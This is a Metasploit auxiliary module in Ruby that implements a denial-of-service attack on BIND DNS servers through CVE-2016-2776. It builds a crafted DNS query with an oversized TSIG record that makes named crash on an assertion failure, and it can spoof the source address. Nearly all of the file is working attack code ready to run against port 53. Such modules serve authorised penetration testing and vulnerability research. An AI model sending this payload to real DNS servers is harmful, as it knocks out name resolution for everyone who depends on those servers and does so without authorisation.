1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Capture
8
  include Msf::Auxiliary::UDPScanner
9
  include Msf::Auxiliary::Dos
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'BIND TSIG Query Denial of Service',
16
        'Description' => %q{
17
          A defect in the rendering of messages into packets can cause named to
18
          exit with an assertion failure in buffer.c while constructing a response
19
          to a query that meets certain criteria.
20

21
          This assertion can be triggered even if the apparent source address
22
          isn't allowed to make queries.
23
        },
24
        # Research and Original PoC - msf module author
25
        'Author' => [
26
          'Martin Rocha',
27
          'Ezequiel Tavella',
28
          'Alejandro Parodi',
29
          'Infobyte Research Team'
30
        ],
31
        'References' => [
32
          ['CVE', '2016-2776'],
33
          ['URL', 'http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html']
34
        ],
35
        'DisclosureDate' => '2016-09-27',
36
        'License' => MSF_LICENSE,
37
        'DefaultOptions' => { 'ScannerRecvWindow' => 0 },
38
        'Notes' => {
39
          'Stability' => [CRASH_SERVICE_DOWN],
40
          'SideEffects' => [],
41
          'Reliability' => []
42
        }
43
      )
44
    )
45

46
    register_options([
47
      Opt::RPORT(53),
48
      OptAddress.new('SRC_ADDR', [false, 'Source address to spoof'])
49
    ])
50

51
    deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')
52
  end
53

54
  def scan_host(ip)
55
    if datastore['SRC_ADDR']
56
      scanner_spoof_send(payload, ip, rport, datastore['SRC_ADDR'])
57
    else
58
      print_status("Sending packet to #{ip}")
59
      scanner_send(payload, ip, rport)
60
    end
61
  end
62

63
  def payload
64
    query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65
65
    query << "\x00\x00"  # Flags: 0x0000 Standard query
66
    query << "\x00\x01"  # Questions: 1
67
    query << "\x00\x00"  # Answer RRs: 0
68
    query << "\x00\x00"  # Authority RRs: 0
69
    query << "\x00\x01"  # Additional RRs: 1
70

71
    # Domain Name
72
    query << get_domain # Random DNS Name
73
    query << "\x00"      # [End of name]
74
    query << "\x00\x01"  # Type: A (Host Address) (1)
75
    query << "\x00\x01"  # Class: IN (0x0001)
76

77
    # Additional records. Name
78
    query << ("\x3f" + Rex::Text.rand_text_alphanumeric(63)) * 3 # 192 bytes
79
    query << "\x3d" + Rex::Text.rand_text_alphanumeric(61)
80
    query << "\x00"
81

82
    query << "\x00\xfa" # Type: TSIG (Transaction Signature) (250)
83
    query << "\x00\xff" # Class: ANY (0x00ff)
84
    query << "\x00\x00\x00\x00" # Time to live: 0
85
    query << "\x00\xfc" # Data length: 252
86

87
    # Algorithm Name
88
    query << ("\x3f" + Rex::Text.rand_text_alphanumeric(63)) * 3 # Random 192 bytes
89
    query << "\x1A" + Rex::Text.rand_text_alphanumeric(26) # Random 26 bytes
90
    query << "\x00"
91

92
    # Rest of TSIG
93
    query << "\x00\x00" + Rex::Text.rand_text_alphanumeric(4) # Time Signed: Jan  1, 1970 03:15:07.000000000 ART
94
    query << "\x01\x2c" # Fudge: 300
95
    query << "\x00\x10" # MAC Size: 16
96
    query << Rex::Text.rand_text_alphanumeric(16) # MAC
97
    query << "\x8f\x65" # Original Id: 36709
98
    query << "\x00\x00" # Error: No error (0)
99
    query << "\x00\x00" # Other len: 0
100
  end
101

102
  def get_domain
103
    domain = "\x06" + Rex::Text.rand_text_alphanumeric(6)
104
    org = "\x03" + Rex::Text.rand_text_alphanumeric(3)
105
    domain + org
106
  end
107
end
108

109